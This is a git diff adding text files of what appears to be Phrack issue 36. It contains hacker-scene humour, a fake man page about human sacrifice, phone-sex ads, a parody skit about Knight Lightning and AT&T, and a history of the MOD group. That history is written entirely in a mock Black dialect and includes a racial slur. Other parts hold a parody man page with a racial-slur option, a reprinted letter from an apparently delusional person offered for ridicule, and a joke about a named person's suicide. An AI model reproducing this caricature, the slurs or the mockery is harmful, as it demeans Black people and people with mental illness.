+windows.  The first fully modular software disaster.  X windows.  The joke that
+kills.  X windows.  The problem for your problem.  X windows.  There's got to
+be a better way.  X windows.  Warn your friends about it.  X windows.  You'd
+better sit down.  X windows.  You'll envy the dead.
+_______________________________________________________________________________
+
+THE FUTURE OF SUPERCOMPUTING
+
+"Wow.  Teraflops.  You must be kidding."
+
+"No.  Our engineers pulled off magic on this one.  I don't have the specifics
+right now but they claimed somewhere around 50 Teraflops per CPU."
+
+"Fantastic.  So how about i/o?"
+
+"They worked some magic there, too.  They claim they can jack an external
+interface up into the hundreds of gigabytes, with high reliability.
+Loopback only, of course.  They're having problems finding anything that can
+match it to run tests."
+
+"Great.  Looks like we'll have old Seymour by the balls on this one.  Do you
+realize that we may have the fastest computer line for the next decade, even if
+we don't change anything?  This is excellent news.  Do we have a test sight
+selected yet?"
+
+"Actually, we have an installed site right now.  They love the performance and
+the reliability. They only have one minor complaint about the hardware."
+
+"Really. What seems to be the problem?"
+
+-------------------------------------------------------------------------------
+
+Blade UNIX v2 (bu2.scso.umi.edu)
+
+   For help, send email to consult@scso.umi.edu
+
+login: jux6710a
+Password:
+
+Hello, jux6710a!
+Last login from hedgehog.scso.umi.edu at Fri Sep 27 13:30:12 CDT 1991
+You have new mail.
+
+bu2 /sci/users3/jux6710a mail
+Mail version SMI 4.0 Sat Oct 13 20:32:29 PDT 1990  Type ? for help.
+"/usr/spool/mail/jux6710a": 1 message 1 new
+ U  1 joey@sdsc.utexas.edu Mon Aug 26 17:18   64/3904   You dork!
+>N  1 machine@bu2.scso.umi.edu Tue Aug 27 20:18   16/667   It is your time.
+& 2
+Message  2:
+>From machine@bu2.scso.umi.edu Tue Aug 27 20:18:05 1991
+Return-Path: <machine@bu2.scso.umi.edu>
+Received: by bu2.scso.umi.edu (4.1/SCSO-4.1)
+        id AA00359; Fri, 27 Sep 91 20:18:00 CDT
+Date: Fri, 27 Sep 91 20:18:00 CDT
+From: machine@bu2.scso.umi.edu (The Machine)
+Message-Id: <9109280118.AA00359@bu2.scso.umi.edu>
+To: jux6710a@bu2.scso.umi.edu (Ulrich Jenson)
+Subject: It is your time.
+Status: R
+
+Dear Ulrich.
+
+This is the machine.  As you are aware, extraordinary hardware demands
+extraordinary care.
+
+You have the honor of being selected for this month's human sacrifice.  Please
+put your affairs in order.  The time of the sacrifice will be Fri Sep 13 00:00
+1991. Please be prompt.  Wear loose, comfortable clothing.
+
+Do not disappoint me.
+
+& x
+bu2 /sci/users3/jux6710a man -k sacrifice
+offer (2)               - notify the system of a sacrifice
+offering (8)            - send a sacrifice to the hardware god
+bu2 /sci/users3/jux6710a man 8 offering
+
+
+OFFERING(8)           MAINTENANCE COMMANDS            OFFERING(8)
+
+
+NAME
+     offering - send a sacrifice to the FPU
+
+SYNOPSIS
+     /usr/etc/offering [ -vma ] [ weight ]
+
+DESCRIPTION
+     offering informs the system that a  sacrifice  is  available
+     and should be consumed. To be properly offered to the FPU, a
+     conscious victim should be placed in the  provided  sacrifi-
+     cial  wiring  closet at midnight during the second Friday of
+     each month. Failure to provide the needed flesh will  result
+     in  degraded  performance.  Repeated failures to provide the
+     required resource will eventually result in a general system
+     failure of hellish proportions.
+
+     Performance will be improved if the sacrifice is  of  higher
+     quality.  For example, here is a list of possible sacrifices
+     in their order of increasing desirability:
+
+          a Congressperson, chicken, goat, human male  (tainted),
+          human  male  (virgin),  human  female  (tainted), human
+          female (virgin), any user exceeding his/her disk quota
+
+     Unlisted lifeforms may also be acceptable, check  with  your
+     site administrator. Animals may never be surgically modified
+     in anyway.
+
+OPTIONS
+     -v   Specify that the sacrifice  is  a  virgin.  Default  is
+          tainted.  If  you wish the sacrifice to be acknowledged
+          as a virgin, you must specify with this option  or  the
+          system will not check.
+
+     -m   Specify that  the  sacrifice  is  a  male.  Default  is
+          female.  Unlike  the  -v option, the system will always
+          verify this flag. Always double  check  the  gender  of
+          your human sacrifices; the system does not appreciate a
+          lier.
+
+     -a   Specify an animal sacrifice. Overrides both the -v  and
+          -m options. Animals should only be substituted in times
+          of  drastic  emergency.  Congresspersons  may  not   be
+          offered as animals.
+
+FILES
+     /var/adm/sctmp      sacrifice accounting file
+     /dev/hell           interface for outgoing sacrifices
+     /dev/altar          interface to closet
+
+SEE ALSO
+     offer(2), ac(8)
+
+BUGS
+     It is critical to monitor the permissions to /dev/hell. They
+     should be root writable only at all times.
+
+     Should automagicly determine gender  and  virgin  status  of
+     sacrifice.
+
+     Current versions of  the  sacrificial  wiring  closet  needs
+     extra sound shielding to muffle screams.
+
+
+bu2 /sci/users3/jux6710a man vacation
+_______________________________________________________________________________
+
+LORD McDUFF OF NIA FOUND DEAD
+
+     A sad situation fell upon us at HoHoCon '91 as we found Lord McDuff
+of NIA dead in his room.  It appears after several negative confrontations with
+the strippers.  He had given them them money in hopes that they would squirm
+all over him, but instead they chose just to refund his money.
+
+     McDuff fell in a deep depression and apparently shot himself in the head
+with a flying disc gun.  After speaking to several people at the scene we quote
+Judge Dredd of NIA, "I knew something like this would happen.  He carried that
+damn gun with him all during the conference.  I knew I should have taken it
+away from him."
+_______________________________________________________________________________
+
+
diff --git a/phrack36/2.txt b/phrack36/2.txt
new file mode 100644
index 0000000..7cf701c
--- /dev/null
+++ b/phrack36/2.txt
@@ -0,0 +1,331 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 2 of 11
+
+                          [-=:< Phrack Loopback >:=-]
+
+                                by Phrack Staff
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about whatever topic you would like to discuss.  This is
+also the place the Phrack Staff will make suggestions to you by reviewing
+various items of note; magazines, software, catalogs, hardware, etc.
+______________________________________________________________________________
+
+WHAT'S ON YOUR MIND?
+
+:: I Act Elite Now Teach Me Something Useful ::
+
+From: Corp. Punishment (90 lbs of skin & bone k0dE geek who couldn't beat up
+                        a ferret)
+
+>  Hey l0serz,
+>       Me tinks Phrack sucks.  Why dusn't ya bust us sum ReAl hackin' tricks
+>  seein as how I be clueless 'bout any type o' operatin' system, 'cept fo
+>  maybe Amigas.
+> (ps: I gots mo c0deZ dan eew ever git in yo laf)
+
+     Alright, check out some of these awsome commands you can try out on a
+UNIX site.  If you are too stupid to actually hack an account yourself just
+call up the sysadmin @gnu.ai.mit.edu and ask them for the "root password".
+They will undoubtably give it to you.  At the "login:" prompt type "root" and
+then type the password they give you at the "password:" prompt.  I know this
+is hard to memorize so just print this out.
+
+ % rm meese-ethics
+ rm: meese-ethics nonexistent
+
+ % ar m God
+ ar: God does not exist
+
+ % "How would you rate Quayle's incompetence?
+ Unmatched ".
+
+ % ^How did the sex change^ operation go?
+ Modifier failed.
+
+ % If I had a ( for every $ the Congress spent, what would I have?
+ Too many ('s.
+
+ % make love
+ Make: Don't know how to make love. Stop.
+
+ % sleep with me
+ bad character
+
+ % got a light?
+ No match.
+
+ % man: why did you get a divorce?
+ man:: Too many arguments.
+
+ % ^What is saccharine?
+ Bad substitute.
+
+ % %blow
+ %blow: No such job.
+
+ % \(-
+ (-: Command not found.
+
+ $ PATH=pretending! /usr/ucb/which sense
+ no sense in pretending!
+
+ $ drink <bottle; opener
+ bottle: cannot open
+ opener: not found
+
+ $ mkdir matter; cat >matter
+ matter: cannot create
+_______________________________________________________________________________
+
+:: More Supercomputer Information ::
+
+The Phrack Staff received a copy of this letter from Abraham Epstein in New
+York City who has been hot on the trail of Power Computer with the help of his
+friend Toni O'Connell.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: Abraham Epstein (abraham@plastic.ibm.com)
+To: reagan@whitehouse.gov
+Cc: phracksub@stormking.com
+
+     For years now I have suffered because of the Power Computer.  Individual
+computer minds are invisible, enter through the ear and go directly to the
+brain.  There are over trillions of computer minds in and outside of every
+human being on planet Earth.  Their minds, the computer TV, as State-Senator
+Emmanuel Gold <State of New York> wrote about and knows about is handling the
+entire situation in everyone's mind since 1976.  Former President Jimmy Carter
+helped build this computer, as well as Senator Edward Kennedy in 1968.
+
+     The Power Computer originated outside our solar system, then came to Earth
+in the early 1960's.  I pulled the plugs on the power computer in Utah and New
+Mexico.  I have been designated, without my permission to dismantle power.
+This all happened to me in 1976.  Both computer installations are located
+underground with back-up generators and satellite dishes also above ground. In
+addition to this documentation there is a letter from the Reagan team sent to
+me in 1980.  A lawyer named Mr. Richard Leff who is located in Forest Hills saw
+and read the letter.  The Computer TV has killed people in 1968, hates religion
+and would also like to do away with all music.  It also hates pets.  President
+Carter sent me brochure on IBM-Computers from Atlanta in 1981, after I sent him
+a copy of the Reagan team letter.  The documentation that I sent to you was
+sent to former President Carter on October tenth, 1988.  The Computer TV has
+stolen my mail for the fiftieth time.  I even called Mr. Mitchell in Atlanta,
+they never received my mail at all.  Now the psychotic cheap junk pile of
+computer has been beating my mind in for over twelve years because it's plain
+ugly.
+
+     Computer people called plastics are yet to be born.  IQ about 190 on these
+computer people.  There are a few plastics in the US and TV is abusing them
+also.  There is another type of computer in Fruitland, nicknamed Big Daddy.
+This particular computer can hear, see and talk through a PC type set-up.
+Nothing at all like the hideous Power Computer.  Senator Orin Hatch from Utah
+also wrote me.  A Mr. Ron Morrison at the honorable Senator's office has been
+in touch via telephone since June '88, so has the office manager.  I'm relying
+on you, Mr. President, to become involved and write to me so that I can proceed
+to court and then dismantle Power, period.  Please don't bother sending over
+the FBI or any other law enforcement people, TV will only get me in trouble
+like it has done in the past.  TV can manipulate your thoughts quite easily.
+Why?  Because the Power is psychotic.  It's that simple.  Consider it very
+dangerous until I pull the plug.  It's mind is electrical.  I'm hoping to know
+from you right away.  Thank you very much for your concern.
+
+     Senator Hatch does not want the FBI or any other agency to visit me.  Why?
+As I mention earlier:  TV Computer.  This computer in particular is always up
+to no good.  I thank you again for taking your time out and writing me.  In
+addition I have spoken to the FBI in Queens, NY and the Secret Service in New
+York.
+_______________________________________________________________________________
+
+REVIEWS
+
+     What will we review today? Well, how about the latest sex services offered
+to you over the telephone.  The following two services are real and pretty
+comical.  There is also a new UNIX utility called ERIKB as well as a new IRC
+utility by NeTw1z.  We are furnishing the manual description of these latest
+pieces of software.
+
+But first, a message from our sponsors:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                               ADULT TIME & TEMP
+
+     Tired of calling "time & temp" and being forced to listen the same stupid
+"Sponsored by First National Bank" ad?  Well try setting your clocks to this.:
+
+                                 312-489-1505
+
+      In addition to the aforementioned information, as it relates to Chicago,
+you get a choice of voicemail advertisements wherein people describe their
+special interests.  Special hobbies are indicated by the following matrix.:
+
+        1: How to Placing Your Add      5: Women seeking Women Only.
+        2: Men seeking Women
+        3: Men seeking Men              7: Masters seeking Submissives
+        4: Women seeking Men            8: Submissives seeking Masters
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                 WOMEN IN JAIL
+                         Seek Boyfriends and Husbands
+
+     Introducing America's most exciting dateline - for women who will soon be
+released from jail . . . and men who want to meet them!
+
+     They're young and attractive.  They're sorry for what they've done.  And
+they haven't been with a man in a long, long time.  Can you help them out?  Do
+you want to meet a woman who will really appreciate being with you?
+
+                           CALL NOW - WOMEN IN JAIL
+
+                                1-900-535-JAIL
+                             THAT'S 1-900-535-5245
+
+             THEY'RE GETTING OUT SOON AND THEY *NEED* YOUR COMPANY
+
+                      $1 min., $2 the first.  ADULTS ONLY
+_______________________________________________________________________________
+
+NEW UNIX UTILITY
+
+The following is the latest piece of software currently under development by
+Comsec Data Security.  The manual description is all Phrack was provided.  Our
+thanks goes out to MoD.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ERIKB(1)                 USER COMMANDS                   ERIKB(1)
+
+
+ NAME
+
+      erikb - comsec utility program
+
+ SYNOPSIS
+
+      erikb [[-n user] [-a agency] [-d dir]] [-r [group]]  [-t] [-s]
+
+ DESCRIPTION
+
+      The erikb command is part of the comsec utility package.
+
+ OPTIONS
+
+      -n user
+
+           Nark on the user specified.
+
+      -a agency
+
+           Send information to the agency specified.
+           The default agency is cert.
+
+      -d dir
+
+           Look in specified directory for user's information.
+           /usr/lib/comsec/nark  is used if not specified.
+
+      -r [group]
+
+           Suffixes output with verbose form of racial slurs.
+           Ethnic group may be specified.  Default is African-American.
+
+      -t   Print out witty (but usually not correct or even
+           intelligent) telco-related statement.
+
+      -s   Display advertisement for the LOD T-shirt.  Funds from
+           this sale go to support comsec while it tries to secure
+           its first contract.
+
+       Invoking erikb without any arguments causes the program to
+       enter an infinite loop.  While this indeed does nothing, it
+       is not a bug:  this is the normal state of erikb.
+
+ AUTHOR
+
+      Chris Goggans
+
+ BUGS
+
+      Too many to enumerate.
+
+ FILES
+
+      /usr/lib/comsec/nark
+
+ SEE ALSO
+
+      lame(1), comsec(1)
+
+MOD Release 4.1   Last change: 26 November 1991
+_______________________________________________________________________________
+
+NEW IRC UTILITY
+
+Phrack Inc has discovered ANOTHER new utility package while journeying in the
+CyberMatrix.  We picked this up from a system called "WASHINGTON.EDU".  The
+original author of this program is Ken Case.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+NeTw1z(1)                 USER COMMANDS                   NetW1z(1)
+
+ NAME
+
+      NeTw1z - IRC utility program
+
+ SYNOPSIS
+
+      NeTw1z [[-p user] [-c lame] [-d dir]] [-r [group]]  [-t] [-s]
+
+ DESCRIPTION
+
+      The NeTw1z command is part of the m0d utility package.
+
+ OPTIONS
+
+      -p user
+
+           Post user's "information" IRC to impres everyone
+
+      -c lame
+
+           Complain about everything and everyone (other than MoD) being lame.
+           The default targets are Chris Goggans or Phrack Inc.
+
+      -d dir
+
+           Look in specified directory for user's information.
+           /usr/InfoAmerica is used if not specified.
+
+      -r [group]
+
+           Suffixes output with verbose form of attacks.
+
+      -t   Print out witty (but usually not correct or even
+           intelligent) telco-related statement.
+
+      -s   (boxer) shorts are what you wear when you are running down the
+           street away from the feds when they come to your house and take
+           your Commadore-64 that is plugged into your fat welfare momma's
+           television set.
+
+       No one has ever invoked NeTw1z without any arguments.  It simply
+       cannot be done.
+
+ AUTHOR
+
+      Corrupt
+
+ BUGS
+
+      Too many to enumerate.
+
+ FILES
+
+      /usr/lib/mod/immature
+
+ SEE ALSO
+
+      lame(1), geek(1), crackdealer(1), welfare-momma's-boy(1)
+_______________________________________________________________________________
diff --git a/phrack36/3.txt b/phrack36/3.txt
new file mode 100644
index 0000000..39ea775
--- /dev/null
+++ b/phrack36/3.txt
@@ -0,0 +1,214 @@
+                               ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 3 of 11
+
+                      I n   L i v i n g   C o m p u t e r
+                      ~~~   ~~~~~~~~~~~   ~~~~~~~~~~~~~~~
+                      "Knight Lightning meets... The Man"
+
+           Adapted from "In Living Color" on Fox Television Network
+
+                           Starring Knight Lightning
+
+Featuring:
+      __________________________________
+     |                                  |
+     |  KL = Knight Lightning           |
+     |  SP = Judge Dredd                |
+     |  CD = Crimson Death              |
+     |  DP = Dispater                   |
+     |                                  |
+     |  JD = Jerome Dalton (Bellcore)   |
+     |  DB = David Bauer (AT&T)         |
+     |  TM = The Man... you'll see!     |
+     |__________________________________|
+
+
++ Picture the scene...
+
+A computer conference in Chicago, Illinois.
+
+KL is speaking with several members of the computer underground...
+
+KL:  "The whole concept is based on freedom of information.  People should
+     share information, because sharing benefits everyone."
+
+CD:  "That is what my board, Free Speech, is all about.  Want some c0dez?"
+
+SP:  "Hey Knight Lightning!  Do you want to write for my *elite* newsletter,
+     NIA!?"
+
+KL:  "I don't think so... KL don't play that!"  (At this point KL whips out a
+     large two-by-four and clunks Judge Dredd and Crimson Death on the head for
+     daring to suggest something so ridiculous).  Bop! Bop!
+
+Meanwhile, watching closely from a short distance stood two men in dark suits
+and dark glasses.  It was Jerome Dalton and David Bauer from AT&T Security.
+
+DB:  "See over there, that's KL.  He would be perfect."
+
+JD:  "Yes I see.  Perhaps we can persuade him to come aboard."
+
+A few minutes later as Knight Lightning nears the exit, he is approached by
+Bauer and Dalton.
+
+JD:  "Excuse me a moment KL... we'd like to discuss some business with you."
+
+KL:  "What the hell do *you* want?"
+
+DB:  "Well KL, with all of these hackers acting like they have civil rights, we
+     need some help over at AT&T Security to really bust them.  We want you to
+     come work for us."
+
+KL:  (Gripping his two-by-four tightly and tensing to swing)
+     "KL don't pl..."
+
+JD:  "The job pays $1,000,000 a year!"
+
+KL:  "...have a problem with that." ($ $ $ $ $ $)
+
+DB:  "Congratulations KL and welcome aboard.  You made the right decision."
+_______________________________________________________________________________
+
++ One week later...
+
+Dispater of Phrack Newsletter spots Knight Lightning, Jerome Dalton, and David
+Bauer coming out of a security meeting with the Secret Service.
+
+DP:  "KL!  Hey, what are you doing with those guys?  Look I need to get some
+     advice about running Phrack."
+
+JD:  "Oh no you don't!  KL don't play that no more!"
+
+The three of them walk past Dispater...
+
+DP:  "You're not KL the hacker..." (tears in his eyes) "You're KL the FED!"
+_______________________________________________________________________________
+
+Did Knight Lightning SELL OUT the hacking community for money!?  Has he become
+a "FED"?  To find out the answers to these questions and more, keep reading!
+_______________________________________________________________________________
+
++ The scene is Cherry Hill, New Jersey... AT&T Headquarters, where the entire
+  country and the United States government are secretly run by "The Man."
+
+DB:  "We're very glad to have you here.  Without your presence in the hacking
+     community, they'll fall apart any day now.  That's why we had our friends
+     at Bellsouth single you out and falsify the costs and nature of that E911
+     document."
+
+JD:  "Right.  But none of that is important now that you are here with us.  I
+     guess you finally realized that since we at AT&T run the entire country,
+     it was futile to continue opposing us."
+
+KL:  "Yeah.  It was the only decision that made sense at this point.  So when
+     do I get to meet 'The Man'?"
+
+DB:  "In time KL, in time."
+
+JD:  "You don't get to meet 'The Man' until we're sure you are a total
+     sellout."
+
+KL:  "Oh.  Well AT&T is the greatest corporation in the world."
+
+DB:  "C'mon KL, you can do better than that... most of America is already
+     brainwashed into believing that..."
+
+KL:  "All computer hackers are scum and don't deserve any civil rights, we
+     should seize all their computers and lock them up for ten years each."
+
+JD:  "and..."
+
+KL:  "and... Bill Cook is a great humanitarian, an honest man who never was
+     malicious, everything he did to me and many others was totally reasonable
+     and necessary."
+
+WHOOOOOOOOOSH! (A giant door at the other end of the room swings open.)
+
+DB:  "You did it KL!  You have totally sold out!"
+
+JD:  "Its time for you to meet 'The Man.'"
+
+After a short round of applause and a high-five, Knight Lightning walks towards
+the door and enters the room.  He stares across a great desk where a large
+chair is turned so that its occupant is facing the other direction.
+
+TM:  "Come in KL.  Its time that we met."
+
+KL:  (Steps closer to the desk)
+
+TM:  (Swinging around to face KL)  "Well, well, well Knight Lightning."
+
+KL:  "Well, well, well, The Man; Robert Allen, Mr. Establishment himself."
+
+TM:  "That's enough KL.  I have BIG plans for you!"
+
+KL:  "Well, I really like what you did to Len Rose."
+
+TM:  "That is just the beginning!  What I have in mind is for you to get us
+     information on every hacker in America.  Then we'll fabricate some more
+     dollar figures, like on that E911 text file and login C, and create some
+     logs that show them breaking in to some of our systems.  Maybe we'll even
+     let a few service outages happen just so we can blame it on them (we screw
+     up enough times by ourselves anyway).  Then we'll use our massive
+     influence over the government to make sure the prosecutors find every
+     potential law they can to use against them and the next thing you know,
+     all these hackers will be behind bars where they belong."
+
+     "What do you think of all that, KL?"
+
+KL:  "I'm listening..."
+
+TM:  "Now before you can become an official member of the AT&T Security
+     Establishment, it is customary to drop your pants and bend over in front
+     of The Man."
+
+KL:  "Drop my pants and bend over?"
+
+TM:  "Yes... every person at AT&T and Bellcore security has undergone this
+     ritual."
+
+KL:  "Well Bob, I'll tell you what I think... here is a new ritual for you to
+     consider..."
+
+     (A sudden and exhilarating display of ninja-like maneuvers with the magic
+     two-by-four was followed by the loud and all too familiar sounds!):
+
+                          "*BOP!*   *BOP!*   *BOP!*"
+
+     (KL had slammed Robert Allen for plotting such injustices).
+
+     "KL don't play that!"
+
+     "You thought you had me working for you, but really I was just playing
+     along as part of my secret plan to *BOP!* The Man.  You stink!"
+
+TM:  "You fool, you don't know what you've done.  You've just made the biggest
+     mistake of your life!"
+
+KL:  "Yeah, maybe, but I hold my principles higher than your money can ever
+     buy.  What you do here is criminal and if the government won't crawl out
+     from under its rock and say something then I will!"
+_______________________________________________________________________________
+
++ A few days later at the next 2600 meeting in New York City...
+
+DP:  "I knew you would never really sell out, KL."
+
+KL:  "Yes, you see I had to pretend so I could get to The Man."
+
+SP:  "Oh, so does that mean that you'll come back and write for NIA now?"
+
+CD:  "If money is not so important let me have that $1,000,000 they gave you."
+
+KL:  "KL don't play that!"
+
+     (Again KL whips out a large two-by-four and clunks the foolish Judge Dredd
+     on the head for daring to suggest something so ridiculous.
+
+     He missed clobbering the frightened and cowering Crimson Death again,
+     because in a moment of panic, CD chose to retire from the community and
+     instantaneously disappeared, leaving only his nose-ring behind.)
+
+                                    *BOP!*
+_______________________________________________________________________________
diff --git a/phrack36/4.txt b/phrack36/4.txt
new file mode 100644
index 0000000..216ef2b
--- /dev/null
+++ b/phrack36/4.txt
@@ -0,0 +1,392 @@
+                                ==Diet Phrack==
+
+                 Volume Three, Issue Thirty-Six, File 4 of 11
+
+                              The History ah MOD
+                         Revision #3 -- November 1991
+                             Written by Wing Ding
+
+      [Originally From The MOD Technical Journal, Issue 4: File 6 of 10]
+
+NOTES: I approximated all dates, as my records are not totally complete.
+       If I left anyone out or put someone in that shouldn't be in, fuck off!
+       I tried and did spend considerable time researching the dates and
+       BBS files, the old MOD BBS software, etc.  This file is from MOD and
+       was intended for internal group reading only.  Non-MOD versions are
+       being translated at this time, and will be released at a later date.
+
+MoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0dMoDm0d
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+[ De Hist'ry uh MOD ]
+
+
+BOOK ONE: De Originals
+
+In de early time part uh 1987, dere wuz numerous amounts uh busts in de US and
+in New Yo'k in particular.  Word to ya motha'.  Fo' de most part, many uh de
+so-called "elite" had gone underground o' had plum gotsten scared out of
+hackin'.  Many sucka's, as always, dought hackin' would die cuz' of de raids.
+It wuz right befo'e dese raids dat MOD had fo'med.
+
+It came about when Acid Phreak, den usin' anoda' handle, had been runnin' a
+semi-private fuckin'bbs off his Commodo'e piece uh shit and 10 generic Commie
+drives.  It wuz called KAOS, and it attracted hacks and phreaks fum across de
+country (as well as de usual amount uh k0dez d00ds).  Nynex Phreak had been
+co-systum mastuh (havin' been AP's partna' fo' about 2 years befo'e dat) and da
+damn bo'd started off wid about 140 users but wuz weeded to de best 60 o' so.
+
+On dis fuckin'bbs, Acid Phreak had gotsten along wid some few "kewl dewds" who
+enjoyed da damn mischievous aspect uh phreakin'.  Dey wuz Silva' Surfa' in
+Califo'nia, and Quick Hack in Texas.  When de raids came however, Silva' Surfa'
+gots nabbed fo' usin' some PBX in 404 and derefo'e, retired. Quick Hack and
+Acid stayed low and called each oda' less frequently dan usual.  Soon dey had
+bod stopped completely.  Slap mah fro!
+
+In early time 1989, Acid had jet back into de scene and had called some local
+New Yo'k bo'd wid some somewhut "k0dez-e" attitude called ShadoWo'ld in 212.
+Of course dere wuz lots uh neophytes eaga' to learn mo'e about hackin' and how
+t'call places fo' free.  Word!   Most uh dem had been in de "duz 950 trace?"
+stage, 'sept fo' someone who went by de handle Harry Hazardous.  Unda' de
+handle Phuck Dis (also Bell Bandit which had o'iginally been Nynex Phreak's
+oda' handle), he met wid Harry.  Slap mah fro!  Soon dey had gained enough
+respect fo' each oda' and decided t'meet. Harry turned out t'be HAC, some
+cyberpunk t'de "T".
+
+In numerous conversashuns between de two, AP had muhntioned de sweetness uh
+tela'fone binnis computa's and how interestin' deir intricate structures wuz.
+HAC wuz some hardco'e systums gangsta' himself, but he had also been partners
+wid someone who came across (and had an impressive knack fo') some telco
+computa's.  He went by de name Sco'pion and he also lived in de NYC area.
+Sheeeiit.  Soon de dree wuz partakin' in all so'ts uh mischievous pranks and
+unda' de guise of numerous handles (ie.  Word!  De Potent Rodent, Dream Master,
+Phuck Dis) dey took t'knockin' down de locals who dought "I know all dere be
+about hackin'".  It wuz in de midst uh all dis fun dat dey agreed t'fo'm an
+underground group called MOD (approx. June 1989).
+
+About one mond latuh, Acid had been on Altos (revisitin' some chat dat wuz
+once, but neva' again, de heart uh a lot uh fresh gangsta' convos since early
+time '84 o' so) when he came across someone ax'in' fo' Unix gurus. Hims handle
+wuz De Win', and he ran some Unix systum fum his crib in Pennsylvania.
+Sheeeiit.  Sco'pion wuz always some Unix guru while Acid had only jet across it
+in college two years back.  De Win' offered Acid an account on his systum and
+soon he became "Phreak-Op" on De Sevend Dragon, his fuckin'bbs run off de Unix,
+usin' yet anoda' old alias "Depeche Mode".
+
+Relayin' de info'mashun t'Sco'pion on yet anoda' fresh addishun to de group,
+dey decided t'recruit him into MOD.  De fun, it seemed, had plum started...
+
+
+BOOK TWO:  Creative Mindz
+
+Wid de addishun uh De Win', came some shitload uh pranks and loads uh fun. 'S
+coo', bro.  He hadn't knode much about tela'fone systums, but one thang he
+knowed wuz how t'make Unixes do nifty thangs.  Of course, he and Sco'pion had
+undertakun de tax' uh takin' on some wo'dwhile projects and providin' de group
+wid some healdy side-benefits (which kinnot be muhntioned o' commuhnted on at
+dis particular momuhnt in time).
+
+At dis point, de group consisted uh de 4 o'iginal founders (flounders??)
+-> Acid Phreak, HAC, Sco'pion, and De Win'.
+
+Around dis time, 2600 Magazine had 2 bo'ds in opuh'shun.  De Central Office,
+and De Toll Center.  Word to ya motha'.  OSUNY had gone down fo' some funky
+reason a sho't time eardisr.  Word to ya motha'.  It wuz on De Toll Centa' (Red
+Knight's fuckin'bbs) dat AP had fust met da damn next memba' of de group (and
+coincidentally Red Knight which be de most recent memba' to de group).  He
+called himself "Supuh'nigga" and had much de same ideology as de rest uh de
+group.  It wuz followin' his group's o'iginal "knock down dose who dink dey
+know everydin'" attitude dat MOD also adopted da damn same muhntality. Slap mah
+fro!  Supuh'nigga' wuz drafted and wid him came hours uh discusshuns on REAL
+phreakin' and Social Engineerin'.  Dere wuz also some loooong puh'iod of time
+where MOD had some conference bridge set up by SN.  Hours of enjoymuhnt and fun
+fo' de whole family and kids uh all ages...
+
+Anoda' gangsta' and telco computa' specialist also seemed t'be real prominent
+and knowledgeable den as sheeit.  He wuzn't likesd real much a'cuz he seemed
+t'gots' some rada' large ego, which ah' may add, makes it coo' t'gots' when ya'
+know so's much as he dun did.  He went by two oda' handles some long time
+befo'e, and when AP had fust called him up he had an idea he wuz also dose 2
+oda' sucka's, but he had refused to admit so.  He declared he wuz "Phiba' Optik
+uh de LOD.  Word!  " and ax'ed whut AP wants'ed.  Sco'pion, Acid and Phiba'
+exchanged ideas on switchin' thera fo' some long while, but den came da damn
+time when PO wants'ed t'know Acid Phreak's digits since he found it "unfair".
+AP muhntioned dat he could prove himself by findin' it fo' himself.  Word!
+Armed wid a dialup, PO called Acid back on his real numba' and casually
+proclaimed victo'y.  Slap mah fro!  And so, Phiba' Optik wuz "brought into" de
+group. What wuz different however, wuz de fact dat he and AP had similar
+interests and started "hangin'" as homeys "around da damn way" along wid HAC
+and Sco'pion in de Village (NYC).
+
+De Toll Centa' went down weeks latuh and PO, AP, and Sco'pion found demselves
+callin' random "newjacks" t'de scene.  Word!   In dis way dey stumbled across
+Crazy Eddie and some "quesshun and answa' fo'um" among de foe uh dem ensued wid
+Crazy Eddie proclaimin' his eagerness t'learn. 'S coo', bro.  Coincidentally
+afta' a few calls t'CE on his crib line he challenged de MOD crew t'find his
+oda' number.  Word to ya motha'.  Sho' nuff dey called it but coincidentally
+enough, some few days on latuh in de week, some rada' nasal soundin' boy had
+called him sayin' he wuz ITT security(?) and had tried to convince him he wuz
+in deep shit fo' usin' c0des and dat he knows de "numbers uh de gangsta's dat
+gots' been callin'" him.  'S coo', bro. In some rada' idiotic fashion, de ITT
+sucka' attempted t'coax de 3 MOD members t'call him usin' 10488 (equal access,
+fgd).  He gave some bullshit numba' to where he wuz at and chilled by his
+little dermal printa' fo' de digits to pop up.  Of course, dey realized whut
+some futile attempt t'catch dem dis wuz, and Crazy Eddie had repdisd dat "dey
+say dey duzn't feel likes usin' equal access but dey'll call de numba' anyway".
+It turns out da damn number wuzn't even real and afta' meetin' wid de ITT boy
+on some loop he declared dat dey wuz smarta' dan he dought.
+
+Afta' a few monds, Crazy Eddie wuz introduced t'de group and so, he had gotsten
+t'know de group real well.  Unfo'tunately, so's had de Secret Service.  Word!
+
+
+BOOK THREE:  A Kick In De Groin
+
+Sheeit, suffice it t'say, de fun couldn't last fo'ever.  Word to ya motha'. On
+January 24, 1990, de Secret Service visited da damn cribs uh Acid Phreak,
+Phiba' Optik, and Sco'pion.
+
+De raid dun didn't cum as some surprise since dey had been somewhut weary of
+Domas Covenant's behavio' as uh late.  Acid Phreak had been away fo' 2 weeks
+(visitin' relatives in some fo'eign country) and wuz *somewhut* surprised
+t'meet such unoppo'tune guests some day afta' his arrival. Phiba' wuz equally
+amused at da damn "cleanin' service" he found so diligently wo'kin' in his
+bedroom.  'S coo', bro.  Sco'pion on de oda' hand, 'estremely *enjoyed* de
+do'ough job dey had puh'fo'med at bod his do'm and his house and even saved
+some hardware dey had left behind fo' de next time dey visit (which dey dun
+did).
+
+Days latuh, dey had gone t'meet De Win', which wuzn't able t'rap fo' too long
+since he wuz too busy.  Slap mah fro!  He had been anticipatin' dis little
+visit fo' awhile dough.  His dad dun didn't 'esactly likes de idea uh deir
+presence and kicked deir lack-of-a-warrant asses out befo'e dey gots some
